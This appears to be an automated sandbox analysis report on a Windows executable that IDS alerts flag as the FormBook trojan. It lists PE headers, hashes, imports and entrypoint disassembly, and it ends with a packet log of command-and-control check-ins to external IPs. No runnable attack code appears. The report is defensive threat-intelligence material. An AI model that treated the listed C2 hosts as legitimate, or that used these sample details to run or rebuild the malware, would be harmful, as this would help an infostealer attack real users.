TLSH:	3C35AE0273D1C036FFABA2739B6AF64556BD78254123852F13981DB9BD701B2233E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6653C4E1 [Sun May 26 23:25:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F5F988173DDh
jmp 00007F5F9880A194h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F5F9880A31Ah
cmp edi, eax
jc 00007F5F9880A67Eh
bt dword ptr [004C41FCh], 01h
jnc 00007F5F9880A319h
rep movsb
jmp 00007F5F9880A62Ch
cmp ecx, 00000080h
jc 00007F5F9880A4E4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F5F9880A320h
bt dword ptr [004BF324h], 01h
jc 00007F5F9880A7F0h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F5F9880A4BDh
test edi, 00000003h
jne 00007F5F9880A4CEh
test esi, 00000003h
jne 00007F5F9880A4ADh
bt edi, 02h
jnc 00007F5F9880A31Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F5F9880A323h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F5F9880A375h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x4f148	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x118000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x4f148	0x4f200	c22b97e0fb966be1b36e9ad566967b81	False	0.917040012835703	data	7.869851604494583	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x118000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x463e0	data			1.0003336670003338
RT_GROUP_ICON	0x116b98	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x116c10	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x116c24	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x116c38	0x14	data	English	Great Britain	1.25
RT_VERSION	0x116c4c	0x10c	data	English	Great Britain	0.5970149253731343
RT_MANIFEST	0x116d58	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/27/24-12:22:10.319360	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63193	80	192.168.2.7	160.251.148.118
05/27/24-12:23:14.615156	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63209	80	192.168.2.7	3.33.130.190
05/27/24-12:21:56.331665	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63189	80	192.168.2.7	203.161.43.227
05/27/24-12:21:29.439800	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63181	80	192.168.2.7	199.59.243.225
05/27/24-12:22:24.036463	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63197	80	192.168.2.7	199.59.243.225
05/27/24-12:23:42.952231	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63217	80	192.168.2.7	38.47.207.149
05/27/24-12:21:14.380304	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63177	80	192.168.2.7	212.227.172.253
05/27/24-12:20:08.835239	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63160	80	192.168.2.7	172.67.190.203
05/27/24-12:23:00.502659	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63205	80	192.168.2.7	199.59.243.225
05/27/24-12:20:32.726865	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63164	80	192.168.2.7	142.250.186.51
05/27/24-12:20:59.368425	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63173	80	192.168.2.7	199.59.243.225
05/27/24-12:23:29.267343	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63213	80	192.168.2.7	91.195.240.92
05/27/24-12:20:46.049229	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63169	80	192.168.2.7	3.33.130.190
05/27/24-12:21:42.893457	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63185	80	192.168.2.7	213.171.195.105
05/27/24-12:22:46.698255	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	63201	80	192.168.2.7	185.31.240.240

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 12:20:08.823646069 CEST	63160	80	192.168.2.7	172.67.190.203
May 27, 2024 12:20:08.830629110 CEST	80	63160	172.67.190.203	192.168.2.7
May 27, 2024 12:20:08.830764055 CEST	63160	80	192.168.2.7	172.67.190.203
May 27, 2024 12:20:08.835238934 CEST	63160	80	192.168.2.7	172.67.190.203
May 27, 2024 12:20:08.842257023 CEST	80	63160	172.67.190.203	192.168.2.7
May 27, 2024 12:20:09.468306065 CEST	80	63160	172.67.190.203	192.168.2.7
May 27, 2024 12:20:09.468329906 CEST	80	63160	172.67.190.203	192.168.2.7
May 27, 2024 12:20:09.468548059 CEST	63160	80	192.168.2.7	172.67.190.203
May 27, 2024 12:20:09.469002962 CEST	80	63160	172.67.190.203	192.168.2.7
May 27, 2024 12:20:09.469060898 CEST	63160	80	192.168.2.7	172.67.190.203
May 27, 2024 12:20:09.472043037 CEST	63160	80	192.168.2.7	172.67.190.203
May 27, 2024 12:20:09.476986885 CEST	80	63160	172.67.190.203	192.168.2.7
May 27, 2024 12:20:24.693749905 CEST	63161	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:24.698690891 CEST	80	63161	142.250.186.51	192.168.2.7
May 27, 2024 12:20:24.698853970 CEST	63161	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:24.700797081 CEST	63161	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:24.705835104 CEST	80	63161	142.250.186.51	192.168.2.7
May 27, 2024 12:20:25.357758999 CEST	80	63161	142.250.186.51	192.168.2.7
May 27, 2024 12:20:25.357909918 CEST	80	63161	142.250.186.51	192.168.2.7
May 27, 2024 12:20:25.357963085 CEST	63161	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:26.211209059 CEST	63161	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:27.233772039 CEST	63162	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:27.238892078 CEST	80	63162	142.250.186.51	192.168.2.7
May 27, 2024 12:20:27.238996983 CEST	63162	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:27.241489887 CEST	63162	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:27.246360064 CEST	80	63162	142.250.186.51	192.168.2.7
May 27, 2024 12:20:27.901139975 CEST	80	63162	142.250.186.51	192.168.2.7
May 27, 2024 12:20:27.901263952 CEST	80	63162	142.250.186.51	192.168.2.7
May 27, 2024 12:20:27.901323080 CEST	63162	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:28.757920027 CEST	63162	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:29.777017117 CEST	63163	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:29.782156944 CEST	80	63163	142.250.186.51	192.168.2.7
May 27, 2024 12:20:29.782390118 CEST	63163	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:29.784356117 CEST	63163	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:29.789297104 CEST	80	63163	142.250.186.51	192.168.2.7
May 27, 2024 12:20:29.789450884 CEST	80	63163	142.250.186.51	192.168.2.7
May 27, 2024 12:20:30.429518938 CEST	80	63163	142.250.186.51	192.168.2.7
May 27, 2024 12:20:30.430598021 CEST	80	63163	142.250.186.51	192.168.2.7
May 27, 2024 12:20:30.430704117 CEST	63163	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:31.710201979 CEST	63163	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:32.713980913 CEST	63164	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:32.719950914 CEST	80	63164	142.250.186.51	192.168.2.7
May 27, 2024 12:20:32.720161915 CEST	63164	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:32.726865053 CEST	63164	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:32.734935999 CEST	80	63164	142.250.186.51	192.168.2.7
May 27, 2024 12:20:33.376640081 CEST	80	63164	142.250.186.51	192.168.2.7
May 27, 2024 12:20:33.376822948 CEST	80	63164	142.250.186.51	192.168.2.7
May 27, 2024 12:20:33.377043009 CEST	63164	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:33.385878086 CEST	63164	80	192.168.2.7	142.250.186.51
May 27, 2024 12:20:33.400046110 CEST	80	63164	142.250.186.51	192.168.2.7
May 27, 2024 12:20:38.423935890 CEST	63166	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:38.429065943 CEST	80	63166	3.33.130.190	192.168.2.7
May 27, 2024 12:20:38.429174900 CEST	63166	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:38.430928946 CEST	63166	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:38.435863018 CEST	80	63166	3.33.130.190	192.168.2.7
May 27, 2024 12:20:38.914235115 CEST	80	63166	3.33.130.190	192.168.2.7
May 27, 2024 12:20:38.915884972 CEST	63166	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:39.945612907 CEST	63166	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:39.950639009 CEST	80	63166	3.33.130.190	192.168.2.7
May 27, 2024 12:20:40.972160101 CEST	63167	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:40.977252960 CEST	80	63167	3.33.130.190	192.168.2.7
May 27, 2024 12:20:40.978652000 CEST	63167	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:40.980408907 CEST	63167	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:40.985405922 CEST	80	63167	3.33.130.190	192.168.2.7
May 27, 2024 12:20:41.449824095 CEST	80	63167	3.33.130.190	192.168.2.7
May 27, 2024 12:20:41.450001955 CEST	63167	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:42.492374897 CEST	63167	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:42.497514963 CEST	80	63167	3.33.130.190	192.168.2.7
May 27, 2024 12:20:43.511022091 CEST	63168	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:43.516285896 CEST	80	63168	3.33.130.190	192.168.2.7
May 27, 2024 12:20:43.516540051 CEST	63168	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:43.518188000 CEST	63168	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:43.523241043 CEST	80	63168	3.33.130.190	192.168.2.7
May 27, 2024 12:20:43.523252010 CEST	80	63168	3.33.130.190	192.168.2.7
May 27, 2024 12:20:43.973032951 CEST	80	63168	3.33.130.190	192.168.2.7
May 27, 2024 12:20:43.973249912 CEST	63168	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:45.023741007 CEST	63168	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:45.028719902 CEST	80	63168	3.33.130.190	192.168.2.7
May 27, 2024 12:20:46.042295933 CEST	63169	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:46.047503948 CEST	80	63169	3.33.130.190	192.168.2.7
May 27, 2024 12:20:46.047596931 CEST	63169	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:46.049228907 CEST	63169	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:46.054205894 CEST	80	63169	3.33.130.190	192.168.2.7
May 27, 2024 12:20:46.517323017 CEST	80	63169	3.33.130.190	192.168.2.7
May 27, 2024 12:20:46.517523050 CEST	80	63169	3.33.130.190	192.168.2.7
May 27, 2024 12:20:46.517708063 CEST	63169	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:46.519928932 CEST	63169	80	192.168.2.7	3.33.130.190
May 27, 2024 12:20:46.527966022 CEST	80	63169	3.33.130.190	192.168.2.7
May 27, 2024 12:20:51.735249996 CEST	63170	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:51.742342949 CEST	80	63170	199.59.243.225	192.168.2.7
May 27, 2024 12:20:51.742428064 CEST	63170	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:51.746674061 CEST	63170	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:51.754067898 CEST	80	63170	199.59.243.225	192.168.2.7
May 27, 2024 12:20:52.199166059 CEST	80	63170	199.59.243.225	192.168.2.7
May 27, 2024 12:20:52.199194908 CEST	80	63170	199.59.243.225	192.168.2.7
May 27, 2024 12:20:52.199212074 CEST	80	63170	199.59.243.225	192.168.2.7
May 27, 2024 12:20:52.199285984 CEST	63170	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:52.199311018 CEST	63170	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:53.258178949 CEST	63170	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:54.276074886 CEST	63171	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:54.281166077 CEST	80	63171	199.59.243.225	192.168.2.7
May 27, 2024 12:20:54.281271935 CEST	63171	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:54.282757998 CEST	63171	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:54.287852049 CEST	80	63171	199.59.243.225	192.168.2.7
May 27, 2024 12:20:54.745572090 CEST	80	63171	199.59.243.225	192.168.2.7
May 27, 2024 12:20:54.745590925 CEST	80	63171	199.59.243.225	192.168.2.7
May 27, 2024 12:20:54.745651960 CEST	80	63171	199.59.243.225	192.168.2.7
May 27, 2024 12:20:54.745661020 CEST	63171	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:54.745687008 CEST	63171	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:55.789546967 CEST	63171	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:56.814440012 CEST	63172	80	192.168.2.7	199.59.243.225
